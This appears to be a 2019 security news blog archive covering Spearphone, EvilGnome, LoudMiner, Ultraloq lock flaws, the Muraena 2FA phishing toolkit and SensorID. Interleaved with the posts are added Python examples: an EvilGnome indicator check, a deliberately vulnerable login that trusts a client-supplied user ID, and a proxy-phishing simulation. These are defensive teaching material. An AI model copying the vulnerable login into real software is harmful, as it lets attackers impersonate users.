    According to The Hacker News, “Since the built-in loudspeaker of a smartphone is placed on the same surface as the embedded motion sensors, it produces surface-borne and aerial speech reverberations in the body of the smartphone when loudspeaker mode is enabled.” Sound consists of vibrations travelling through a medium; they transfer energy to our eardrums, which turn the mechanical vibrations into electrical signals that our brains interpret as sound. This attack bypasses the need for a second microphone by replacing the audio receiver with the accelerometer in the phone itself, which translates the sound waves into electrical signals.

    As a proof-of-concept, the researchers created an Android application designed to record speech reverberations using the accelerometer and send the captured data back to an attacker-controlled server. The researchers have shown that this attack can successfully be used to spy on phone calls, listen to voice notes or multimedia, and spy on the use of an assistant such as Google Assistant or Bixby, as shown below.

    The research team believes the Spearphone attack is dangerous and has “significant value as it can be created by low-profile attackers.” The attack can also be used in gender classification with over 90% accuracy and speaker identification with over 80% accuracy. 
read the full article here

Linux users, be aware

    In the world of malware, almost all malicious software is based around Windows desktop or Linux server systems. Part of this is due to the widespread use of these systems as well as the architecture of the Linux core operating system. This makes it even more surprising when researchers from Intezer recently discovered a desktop Linux spyware application dubbed EvilGnome that no security or antivirus scanners detect yet.

    EvilGnome is a collection of modules designed to spy on a user’s system and exfiltrate data to an external Command & Control (C2) server controlled by the attacker. It is designed to appear as an extension of the Gnome GUI environment for Linux desktop.

    The malware is a self-extracting archive shell script that installs the modules and sets up persistence through use of the crontab. The modules are:
  • ShooterSound—records audio clips from the user’s microphone using PulseAudio.
  • ShooterImage—captures screenshots of the user’s desktop.
  • ShooterFile—scans the filesystem and is capable of filtering files by type and creation date.
  • ShooterPing—data exfiltration module, also capable of receiving new commands from the C2 server and stopping other modules from running.
  • ShooterKey—possible keylogger module that appears to be unfinished.

    Many of the modules appear to be very limited or missing some functionality. Also, metadata about the malware’s creation was included in the upload to VirusTotal, leading the researchers to believe this was a prototype version of the malware that was mistakenly released.

    Intezer researchers believe the malware to be tied to the Russian-affiliated group Gamaredon. Not only does EvilGnome use the same hosting provider as Gamaredon for C2 servers and similar domain names such as .space and .ddns, it was also found on an IP address controlled by Gamaredon 2 months ago and uses techniques and modules similar to Gamaredon’s collection of Windows tools. 
    To check if a Linux system is infected, look for an executable called gnome-shell-ext in the ~/.cache/gnome-software/gnome-shell-extensions directory.
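The check above, as an added example that is not from the post or from Intezer: it looks for the gnome-shell-ext executable in the directory the post names and scans crontab text for the persistence entry the post says the installer creates. The home path and crontab text are parameters so the check can also be run against a constructed layout.

```python
"""Added example, not from the post or from Intezer: checks a home directory
for the EvilGnome indicator the post names (an executable called gnome-shell-ext
under ~/.cache/gnome-software/gnome-shell-extensions) and scans crontab text
for the persistence entry the post says the installer creates. The home path
and crontab text are parameters so the check can also run on a constructed
layout; the two indicator names are the page's own."""
import os
import stat
import subprocess

# Indicator from the post: launcher name and the directory it lives in.
EVILGNOME_DIR = os.path.join(".cache", "gnome-software", "gnome-shell-extensions")
EVILGNOME_EXE = "gnome-shell-ext"


def find_evilgnome_indicators(home: str, crontab_text: str) -> list:
    """Return human-readable findings; an empty list means nothing matched."""
    findings = []
    exe_path = os.path.join(home, EVILGNOME_DIR, EVILGNOME_EXE)

    if os.path.isfile(exe_path):
        mode = os.stat(exe_path).st_mode
        executable = bool(mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH))
        findings.append(f"file present: {exe_path} (executable={executable})")

    # Persistence: flag any active crontab line that references the launcher
    # name or its directory, so a renamed copy in the same place is still caught.
    for lineno, line in enumerate(crontab_text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        if EVILGNOME_EXE in stripped or "gnome-shell-extensions" in stripped:
            findings.append(f"crontab line {lineno} references indicator: {stripped}")
    return findings


def read_user_crontab() -> str:
    """Best-effort read of the current user's crontab; empty string if none."""
    try:
        result = subprocess.run(["crontab", "-l"], capture_output=True,
                                text=True, check=False)
    except FileNotFoundError:       # no cron installed on this host
        return ""
    return result.stdout


if __name__ == "__main__":
    hits = find_evilgnome_indicators(os.path.expanduser("~"), read_user_crontab())
    print("\n".join(hits) if hits else "no EvilGnome indicators found")
```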





Thursday, July 18, 2019

A Methodology for Enabling Forensic Analysis Using Hypervisor Vulnerabilities Data: NIST Publishes NISTIR 8221

Hardware/Server Virtualization is a foundational technology in a cloud computing environment and the hypervisor is the key software in that virtualized infrastructure. However, hypervisors are large pieces of software with several thousand lines of code and are therefore known to have vulnerabilities. Hence, a capability to perform forensic analysis to detect, reconstruct and prevent attacks based on vulnerabilities on an ongoing basis is a critical requirement in cloud environments.

To gain a better understanding of recent hypervisor vulnerabilities and attack trends, identify forensic information needed to reveal the presence of such attacks, and develop guidance on taking proactive steps to detect and prevent those attacks, NIST has published NIST Internal Report (NISTIR) 8221, “A Methodology for Enabling Forensic Analysis Using Hypervisor Vulnerabilities Data.” NISTIR 8221 outlines a methodology to enable this forensic analysis, and illustrates the methodology using two open-source hypervisors—Xen and Kernel-based Virtual Machine (KVM). The source for vulnerability data is NIST’s National Vulnerability Database (NVD).

Publication details:

CSRC Update:


Saturday, July 13, 2019

NCSC Releases Advisory on Ongoing DNS Hijacking Campaign


Original release date: July 12, 2019

The United Kingdom’s National Cyber Security Centre (NCSC) has released an advisory about an ongoing Domain Name System (DNS) hijacking campaign. The advisory details risks and mitigations for organizations to defend against this campaign, in which attackers use compromised credentials to modify the location to which an organization’s domain name resources resolve to redirect users, obtain sensitive information, and cause man-in-the-middle attacks.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages administrators to review the NCSC Advisory, apply the recommended mitigations, and refer to CISA’s Alert AA19-024A – DNS Infrastructure Hijacking Campaign for more information.

Wednesday, July 10, 2019

Draft NIST Cybersecurity White Paper on Understanding Emerging Blockchain Identity Management Systems

    NIST announces the release of a Draft Cybersecurity White Paper, A Taxonomic Approach to Understanding Emerging Blockchain Identity Management Systems (IDMS), which provides an overview of the standards, building blocks, and system architectures that support emerging blockchain-based identity management systems and selective disclosure mechanisms. The document also considers the full spectrum of top-down versus bottom-up governance models for both identifier and credential management and addresses some of the risks and security concerns that may arise. The terminology, concepts, and properties introduced in this work can facilitate communications amongst business owners, software developers, cybersecurity professionals within an organization, and individuals who are or will be using such systems.

    A public comment period for this document is open until August 9, 2019. See the publication details link for a copy of the document and instructions for submitting comments.

Publication details:

CSRC update:


Saturday, July 6, 2019

First-ever malware strain spotted abusing new DoH (DNS over HTTPS)

Godlua, a Linux DDoS bot, is the first-ever malware strain seen using DoH to hide its DNS traffic.
Go Here to read about this from Catalin Cimpanu @ ZDnet.

    The U.S. Food and Drug Administration released a warning last week recalling certain Medtronic MiniMed insulin pumps over concerns that the device may be vulnerable to cyber attacks. The warning comes after researchers found that an attacker with adjacent access was able to wirelessly communicate with the device and alter the pump settings, either providing or restricting insulin to a patient. These insulin pumps are meant to communicate wirelessly with other medical devices such as blood glucose meters, glucose sensor transmitters, and CareLink USB devices. The models specifically impacted are the Medtronic MiniMed insulin pumps, the MiniMed 508 insulin pump, and the MiniMed Paradigm series, which are collectively used by approximately 4,000 patients in the U.S., according to Medtronic.

    This vulnerability is described by CVE-2019-10964 and has been assigned a score of 7.1 out of 10, designating it as a high severity vulnerability. The core of the vulnerability revolves around improper access control when associating with other devices. The researchers state that the wireless RF communication protocol doesn’t properly implement authentication or authorization, two important factors that mediate network access. In computer security, authentication refers to the mechanism by which a device is proven to be a legitimate user, and authorization refers to the resources that the device has access to. The researchers found that an attacker with sufficient access can inject, replay, alter, or interpret data from the vulnerable insulin pumps. Medtronic is urging patients affected by this vulnerability to talk to their healthcare provider about exchanging their insulin pump for a newer model with appropriate security measures.

    While this exploit has not been seen in the real world and there are no known reports of patient harm resulting from it, users of wirelessly connected medical equipment can take precautions to protect themselves: ensure that no one tampers with the medical device or with other devices connected to it, refrain from sharing the device’s serial number, pay attention to any alarms or alerts the device raises, and immediately cancel any unintended action the device takes. While it is always important for companies to implement proper security protocols in their devices, it’s even more important when there is the potential for serious harm to an end user, such as in the medical field. As more of these important systems become connected, the need for good security implementation becomes more and more important.




Smart Lock Vulnerabilities

    Smart locks have been increasing in popularity for the last few years. They provide a number of conveniences that make them an enticing option for people looking to replace their current locks. Things like automatically unlocking as you approach with your hands full or allowing a friend to unlock the door only when you’re on vacation sound great at first. But the risks of poorly secured and designed smart locks may outweigh those conveniences.

    Pen Test Partners along with 2 additional researchers, @evstykas and @cybergibbons, recently took a look at the U-tec Ultraloq and found a number of critical vulnerabilities that would allow an unauthorized person to bypass the lock. The first vulnerability they found was that their application API leaks data about the users of the locks, including the physical location of where the lock is. The second vulnerability found in their API is much more interesting though. By simply changing the user ID value during the login process you can impersonate any other user and have full control of their locks. Pairing these 2 vulnerabilities together means you would first be able to find installations of these locks and then unlock them when you get there.
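The login flaw described above, as an added example that is not the Ultraloq app's or API's code: a minimal model in which a client-supplied user ID is trusted during login, beside a hardened login that binds the session to the account whose password was actually checked. Users, locks, passwords and the request shape are constructed sample data.

```python
"""Added example, not the Ultraloq app's or API's code: a minimal model of the
login flaw the post describes (a client-supplied user ID trusted during login,
letting one account act as another) next to a hardened login that binds the
session to the principal whose password was actually checked. Users, locks,
passwords and the request shape are constructed sample data."""
import secrets

# Constructed sample data.
PASSWORDS = {"alice": "alice-pw", "bob": "bob-pw"}   # plaintext only for the demo
LOCK_OWNER = {"lock-A": "alice", "lock-B": "bob"}
SESSIONS = {}                                        # token -> user the session acts as


def vulnerable_login(request: dict):
    """Checks the password for `username`, then binds the session to the
    separate `user_id` field the client sent. Nothing ties the two together,
    so a valid account can log in 'as' any other user ID."""
    if PASSWORDS.get(request.get("username")) != request.get("password"):
        return None
    token = secrets.token_hex(16)
    SESSIONS[token] = request["user_id"]
    return token


def hardened_login(request: dict):
    """The session identity is the principal that was authenticated; any
    user_id in the body is ignored rather than trusted."""
    username = request.get("username")
    if PASSWORDS.get(username) != request.get("password"):
        return None
    token = secrets.token_hex(16)
    SESSIONS[token] = username
    return token


def unlock(token, lock_id: str):
    """Shared lock-control endpoint: authorises purely on the session identity."""
    acting_user = SESSIONS.get(token)
    if acting_user is None:
        return 401, "not logged in"
    if LOCK_OWNER.get(lock_id) != acting_user:
        return 403, "not your lock"
    return 200, f"unlocked {lock_id} as {acting_user}"


def demo_impersonation():
    """Bob authenticates with his own password but sends alice's user ID,
    then tries to open alice's lock. Returns the HTTP-style status from each
    login path."""
    request = {"username": "bob", "password": "bob-pw", "user_id": "alice"}
    vuln_status = unlock(vulnerable_login(request), "lock-A")[0]
    hard_status = unlock(hardened_login(request), "lock-A")[0]
    return vuln_status, hard_status


if __name__ == "__main__":
    print(demo_impersonation())   # (200, 403)
```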

    The researchers also spent some time looking at the Bluetooth based proximity unlocking feature. Due to a poor encryption implementation in the app and lock they were able to develop a brute force attack capable of unlocking the lock. This attack would allow someone to open an Ultraloq without requiring knowledge of who the lock belongs to like in the first attack. These 2 attacks alone allow complete bypass of the smart lock, but what if the attacker isn’t very technical? No problem, the lock is also easily picked. By inserting a thin pick into the body of the lock an attacker is able to shim the mechanism and open the lock with ease. The fallback physical lock mechanism was also easily picked by the researchers using only basic lockpicking techniques.

    The Ultraloq isn’t the only smart lock to have showstopping vulnerabilities and probably won’t be the last. Smart home products, especially security-related ones, have been a popular target for researchers since they first hit the market. If you’re considering a smart lock, it is important to research the specific model being considered and stick to trusted manufacturers. Even so, there is no guarantee that the lock won’t have a vulnerability found at some point, so it is also important to apply firmware updates when they become available from the manufacturer. Ultraloq released a fix for their API last week but have not provided an update for the Bluetooth vulnerability yet.




Sunday, June 30, 2019

Sometimes free is the juicy apple with a parasite waiting to land.

    When something is free, chances are pretty high that "the user" is the product. Services that are free usually generate value for the creator or provider by sharing exposure with advertisers or perhaps using the data collected from the "free" product for other means such as market studies or product testing before a final product. But sometimes free is the juicy apple with a parasite waiting to land its hook inside the consumer's gut.

    Researchers from ESET and Malwarebytes Labs have found cryptominers within high-end music production software products provided for free to download and use. Named LoudMiner by ESET and, independently, Bird Miner by Malwarebytes Labs, the cryptominer hides by bundling itself inside already large files. The pirated versions of Virtual Studio Technology programs seem to function normally except that they run slower because of the increased processor load. This bundling not only hides the existence of the additional malicious installation software, but also focuses the campaign on users with high processing power: users who need to process visual and audio media. The miner runs inside a lightweight virtual machine (VM) in the background. This keeps it hidden from the user and also lets the same payload serve Mac, Windows, and Linux users, lowering the skill threshold for the developer.

    Once installed, the cryptominer hides itself by watching for Activity Monitor and pausing its work when it might be observed; otherwise it can consume up to 90% of the CPU. While the user might notice slowdowns, troubleshooting them is harder than just looking at what’s running. It can even detect which CPU is in use and how many cores are available, running up to two VMs simultaneously to siphon off processing power more efficiently. The Mac version runs QEMU and the Windows version runs VirtualBox; although installing the emulators requires a trust verification, they name themselves "Oracle Corporation Network Service" to disguise their clandestine nature, and the folders they are installed into are set to hidden. The VM runs a version of Linux called Tiny Core Linux 9.0 and is set to mine Monero using XMRig, mining to a mining pool. Profits are shared with other Monero users in the mining pool, but they are also untraceable to the attacker.

    It is always inadvisable to use pirated software, but if one ends up using software from less than reputable sources, be wary of unexpected CPU consumption, trust requests, services, or launch Daemons. While it can be nice to provide some value to a service that is otherwise free, it's definitely better when you’re an aware and willing participant.


Tuesday, June 25, 2019

Considerations for Managing Internet of Things (IoT) Cybersecurity and Privacy Risks:

NIST announces the publication of NISTIR 8228, Considerations for Managing Internet of Things (IoT) Cybersecurity and Privacy Risks, which provides guidance for federal agencies and other organizations to better understand and manage the risks associated with individual IoT devices throughout the lifecycles of those devices. It also considers three high-level goals for risk mitigation: device security, data security, and individual privacy. This introductory report provides the foundation for a planned series of publications on more specific aspects of this topic.


Publication details:


CSRC Update

Wednesday, June 19, 2019

NIST Announces the Initial Public Drafts of SP 800-171 Rev. 2 and SP 800-171B


NIST is seeking comments on Draft NIST Special Publication (SP) 800-171 Revision 2, Protecting Controlled Unclassified Information in Nonfederal Systems and Organizations, and Draft NIST SP 800-171B, Protecting Controlled Unclassified Information in Nonfederal Systems and Organizations: Enhanced Security Requirements for Critical Programs and High Value Assets.

The public comment period for both publications ends on July 19, 2019. Comments can also be submitted on a Department of Defense (DoD) cost estimate for implementing the enhanced security requirements of SP 800-171B. See the publication details links below for document files and instructions on submitting comments.


Draft NIST SP 800-171 Rev. 2 provides minor editorial changes in Chapters One and Two, and in the Glossary, Acronyms, and References appendices. There are no changes to the basic and derived security requirements in Chapter Three. For ease of use, the Discussion sections, previously located in Appendix F (SP 800-171 Rev. 1), have been relocated to Chapter Three to coincide with the basic and derived security requirements.

Publication details for SP 800-171 Rev. 2:


Draft NIST SP 800-171B, Protecting Controlled Unclassified Information in Nonfederal Systems and Organizations: Enhanced Security Requirements for Critical Programs and High Value Assets, was developed in the spring of 2019 as a supplement to NIST SP 800-171. This new document offers additional recommendations for protecting Controlled Unclassified Information (CUI) in nonfederal systems and organizations where that information runs a higher than usual risk of exposure. When CUI is part of a critical program or a high value asset (HVA), it can become a significant target for high-end, sophisticated adversaries (i.e., the advanced persistent threat (APT)). In recent years, these critical programs and HVAs have been subjected to an ongoing barrage of serious cyberattacks, prompting the Department of Defense to request additional guidance from NIST.

The enhanced security requirements are to be implemented in addition to the basic and derived requirements in NIST SP 800-171, since the basic and derived requirements are not designed to address the APT.  The enhanced security requirements apply only to components of nonfederal systems that process, store, or transmit CUI or that provide protection for such components when the designated CUI is contained in a critical program or HVA. The enhanced security requirements are only applicable for a nonfederal system or organization when mandated by a federal agency in a contract, grant, or other agreement.

All public comments received on Draft NIST SP 800-171B will be posted at both https://csrc.nist.gov/projects/protecting-cui/public-comments and https://www.regulations.gov/docket?D=NIST-2019-0002 (Regulations.gov docket no. NIST-2019-0002) without change or redaction, so commenters should not include information they do not wish to be posted (e.g., personal or business information). 

The DoD has completed a cost analysis to provide stakeholders insight into the estimated cost of implementing the enhanced security requirements in Draft NIST SP 800-171B. The cost analysis is available for review and comment at the publication details link below. Please submit any comments regarding the DoD cost analysis review by July 19, 2019 to www.regulations.gov/docket?D=DOD-2019-OS-0072 (Regulations.gov docket no. DOD-2019-OS-0072).

Publication details for Draft SP 800-171B (including the document, DoD Cost Estimate, and recommended comment template):


NOTE: A call for patent claims is included in both draft publications. For additional information, see the “Information Technology Laboratory (ITL) Patent Policy--Inclusion of Patents in ITL Publications”:

Please send any questions to sec-cert@nist.gov.


Tuesday, June 18, 2019

DHS Email Phishing Scam

The Cybersecurity and Infrastructure Security Agency (CISA) is aware of an email phishing scam that tricks users into clicking on malicious attachments that look like legitimate Department of Homeland Security (DHS) notifications. The email campaign uses a spoofed email address to appear like a National Cyber Awareness System (NCAS) alert and lure targeted recipients into downloading malware through a malicious attachment.

CISA encourages users and administrators to take the following actions to avoid becoming a victim of social engineering and phishing attacks:

  • Be wary of unsolicited emails, even if the sender appears to be known; attempt to verify web addresses independently (e.g., contact your organization's helpdesk or search the internet for the main website of the organization or topic mentioned in the email).
  • Use caution with email links and attachments without authenticating the sender. CISA will never send NCAS notifications that contain email attachments.
  • Immediately report any suspicious emails to your information technology helpdesk, security office, or email provider.

Wednesday, June 12, 2019

Researchers presented a toolkit that automates phishing when 2 factor authentication is involved

    Phishing attacks are perhaps the most common method attackers use to gain access to a target network. It is so common that many companies employ outside firms to run test phishing campaigns in order to train employees on what to look out for. Even with this kind of training, many employees continue to type their credentials into pages designed specifically to steal them. Implementing 2 factor authentication mitigates a lot of risk because login credentials become useless to an attacker without the time-based one-time code that 2 factor authentication provides.

    To defeat 2 factor authentication, attackers shifted their methods from collecting credentials to collecting session tokens. This makes the attack more complicated: instead of just setting up a fake login page that saves credentials and forwards the user as if nothing happened, they have to proxy the traffic in real time so that the user types in their one-time code. Because a one-time code cannot be used again, storing the captured information for later is useless. Instead the attacker must capture the session token the server issues on a successful login and use it in their own browser to gain access to the target system. While this attack was always possible, a recently released toolkit makes it much easier.
    Last month at the Hack In The Box conference in Amsterdam, researchers presented a toolkit that automates phishing when 2 factor authentication is involved. The toolkit is made up of 2 parts that work together to automate the attack. The first is Muraena, a minimal-configuration proxy designed to sit between the user and the target login page. It supports automatic resource rewriting so that the attacker doesn’t need to spend much time customizing each specific phish page. More advanced configuration options are available too, for sites which employ advanced anti-phishing defenses. The second part of the toolkit is NecroBrowser, an API-controlled headless Chrome browser instance designed to use the session token stolen by Muraena. It is designed to be set up in an automated fashion so that it can immediately perform tasks on behalf of the attacker during a successful attack.
    Currently there are very few solutions that successfully mitigate a well-run attack with this toolkit. Using Universal 2nd Factor (U2F) authentication instead of traditional 2 factor services is the most effective way to prevent this attack, as it stops the attack from working at all. It is also important to continue training employees about the ever-evolving attack landscape so that they can successfully identify and avoid these attacks.
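Why a relayed one-time code still yields a session while U2F does not, as an added example that is not Muraena, NecroBrowser or any real U2F implementation: a simplified model in which the browser, not the user, reports the origin the login page was loaded from, and the device folds that origin into what it signs. The device signature is modelled as an HMAC over a per-site key (real U2F uses a per-site asymmetric key pair and signs a hash of browser-supplied client data); the hostnames and keys are constructed.

```python
"""Added example, not Muraena, NecroBrowser or any real U2F implementation:
a simplified model of why a real-time phishing proxy that relays a time-based
code still ends up with a usable session, while an origin-bound second factor
in the U2F style does not. The device signature is modelled as an HMAC over a
per-site key (real U2F uses a per-site asymmetric key pair and signs a hash of
client data that the browser fills in); hostnames and keys are constructed."""
import hashlib
import hmac
import secrets
import time

REAL_SITE = "login.example-bank.test"                  # constructed hostnames
PROXY_SITE = "login.example-bank.test.attacker.test"   # lookalike the proxy serves


def totp_like(secret: bytes, now: float, step: int = 30) -> str:
    """Time-based one-time code, simplified: HMAC of the 30-second counter."""
    counter = int(now // step).to_bytes(8, "big")
    return hmac.new(secret, counter, hashlib.sha1).hexdigest()[:6]


def device_sign(device_key: bytes, challenge: bytes, browser_origin: str) -> bytes:
    """The browser, not the user, supplies the origin the page was loaded from,
    and the device folds it into what it signs."""
    return hmac.new(device_key, challenge + browser_origin.encode(), hashlib.sha256).digest()


class RelyingParty:
    def __init__(self, host: str, totp_secret: bytes, device_key: bytes):
        self.host, self.totp_secret, self.device_key = host, totp_secret, device_key
        self.pending = set()   # unused challenges
        self.sessions = set()  # issued session tokens

    def login_totp(self, code: str, now: float):
        """A relayed code is indistinguishable from one typed on the real site."""
        if not hmac.compare_digest(code, totp_like(self.totp_secret, now)):
            return None
        return self._issue()

    def challenge(self) -> bytes:
        ch = secrets.token_bytes(32)
        self.pending.add(ch)
        return ch

    def login_u2f(self, challenge: bytes, claimed_origin: str, signature: bytes):
        """Single-use challenge; the claimed origin must be this site AND the
        signature must cover that origin, so neither relay nor forgery passes."""
        if challenge not in self.pending:
            return None
        self.pending.discard(challenge)
        if claimed_origin != self.host:
            return None
        expected = device_sign(self.device_key, challenge, claimed_origin)
        if not hmac.compare_digest(expected, signature):
            return None
        return self._issue()

    def _issue(self) -> str:
        token = secrets.token_hex(16)
        self.sessions.add(token)
        return token


def simulate_proxy_phish() -> dict:
    """Four outcomes: TOTP relayed through the proxy, U2F relayed through the
    proxy, U2F with the origin field rewritten, and a genuine U2F login."""
    totp_secret, device_key = secrets.token_bytes(20), secrets.token_bytes(32)
    bank = RelyingParty(REAL_SITE, totp_secret, device_key)
    now = time.time()

    # TOTP: victim types the code into the proxy page; the proxy forwards it at once.
    stolen_totp = bank.login_totp(totp_like(totp_secret, now), now)

    # U2F: proxy forwards the real challenge, but the victim's browser is on PROXY_SITE.
    ch = bank.challenge()
    stolen_u2f = bank.login_u2f(ch, PROXY_SITE, device_sign(device_key, ch, PROXY_SITE))

    # Proxy rewrites the origin field to the real site; the signature no longer matches.
    ch = bank.challenge()
    forged = bank.login_u2f(ch, REAL_SITE, device_sign(device_key, ch, PROXY_SITE))

    # Genuine login from the real site.
    ch = bank.challenge()
    legit = bank.login_u2f(ch, REAL_SITE, device_sign(device_key, ch, REAL_SITE))

    return {
        "totp_session_stolen": stolen_totp is not None,
        "u2f_session_stolen": stolen_u2f is not None,
        "u2f_forged_origin_accepted": forged is not None,
        "u2f_genuine_login_ok": legit is not None,
    }


if __name__ == "__main__":
    print(simulate_proxy_phish())
```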




SensorID, the calibration fingerprinting attack

    Over the years, app security has improved enough that developers must request permissions to areas of your smartphone that their applications need to access. Now we have some control over which apps have access to things such as your camera or extended storage. But did you know that there are still parts of your phone that require no permissions whatsoever? The average smartphone can have over a dozen sensors in it from accelerometers and gyroscopes to proximity sensors and GPS. When these sensors are calibrated at the factory, each one comes off the line with tiny imperfections. This results in each phone having its own unique fingerprint baked right into the firmware and accessible from any application or website.

    SensorID, the calibration fingerprinting attack, uses the calibration data from iOS magnetometers and gyroscopes and Android accelerometers, magnetometers, and gyroscopes to create a unique profile of a phone. Because this type of a fingerprint doesn’t change, a user could potentially be tracked across any application and on any website without ever knowing about it. The calibration data can be pulled from a device nearly instantly and requires little more than an app download or some JavaScript. 

    Apple devices are disproportionately impacted by SensorID due to the more rigorous calibration processes they go through at the factory, but the good news is that Apple addressed the issue in their March release of iOS 12.2. Junk data is now added to the calibration data to eliminate the fingerprint.

    On the other hand, Google has yet to address the vulnerability, leaving some Android devices still open to this attack. It's mainly the higher-end Android devices that are vulnerable, as the less expensive devices often skip the sensor calibration step to save on cost, so there is no calibration data on the device to exploit. Google researchers are supposedly looking into the issue.

    Even if your device is open to a calibration fingerprinting attack, there are still plenty of simpler attacks that cyber criminals (or advertisers) are more likely to leverage before one like SensorID.

    While that's not exactly comforting, hopefully SensorID has been cut off at the pass before it could become a bigger problem.